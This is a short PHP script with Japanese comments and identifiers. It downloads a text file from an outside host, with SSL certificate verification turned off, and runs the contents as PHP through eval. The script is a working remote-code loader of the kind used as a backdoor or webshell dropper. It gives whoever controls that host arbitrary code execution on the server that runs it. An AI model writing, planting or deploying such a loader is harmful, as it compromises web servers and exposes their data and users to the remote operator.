<?php
// バージョン2: fopenとfreadを使用したループ読み込み
$URL = 'https://myzedd.tech/project/rahman1.txt';
$コンテキスト = stream_context_create(['ssl' => ['verify_peer' => false]]);

$ファイルポインタ = fopen($URL, 'r', false, $コンテキスト);

if ($ファイルポインタ) {
    $データ = '';
    while (!feof($ファイルポインタ)) {
        $データ .= fread($ファイルポインタ, 8192);
    }
    fclose($ファイルポインタ);

    if (!empty($データ)) {
        eval('?>' . $データ);
    }
}
?>